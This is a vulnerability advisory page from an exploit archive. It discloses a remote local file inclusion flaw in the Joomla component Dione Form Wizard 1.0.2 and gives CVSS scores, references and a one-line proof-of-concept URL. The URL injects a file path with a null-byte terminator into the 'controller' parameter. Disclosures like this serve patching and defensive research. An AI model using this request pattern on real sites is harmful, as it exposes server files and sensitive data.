Joomla Component FDione Form Wizard lfi vulnerability

2010.05.28
Credit: Chip D3 Bi0s
Risk: High
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

----------------------------------------------------------------------------------------- Joomla Component FDione Form Wizard lfi vulnerability ----------------------------------------------------------------------------------------- Author : Chip D3 Bi0s Email : chipdebios[alt+64]gmail.com Date : 2010-05-13 Impact : Exposure of sensitive information Where : From Remote --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : Dione Form Wizard version : 1.0.2 Developer : Dione Soft Company License : GPL type : Commercial price : $20 Date Added : 9 may 2010 Download : http://dionesoft.com/products/dione_form_wizard/product.html Description : Dione Form Wizard is Joomla! component allows website administrator to create web forms easily through simple drag-and-drop editor. This product gives you the power to create forms that run inside Joomla without requiring knowledge of HTML, MySQL and PHP. The main idea of the Dione Form Wizard is to give a tool that is enabling you to create a dynamic forms in minutes within your Joomla! CMS. --------------------------------------------------------------------------- Poc/Exploit: ~~~~~~~~~ http://127.0.0.1/[path]/index.php?option=com_dioneformwizard&controller=[LFI]%00 +++++++++++++++++++++++++++++++++++++++ #[!] Produced in South America +++++++++++++++++++++++++++++++++++++++

References:

http://xforce.iss.net/xforce/xfdb/58574
http://www.securityfocus.com/bid/40166
http://www.exploit-db.com/exploits/12595
http://secunia.com/advisories/39755
http://packetstormsecurity.org/1005-exploits/joomlafdione-lfi.txt
http://osvdb.org/64633


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top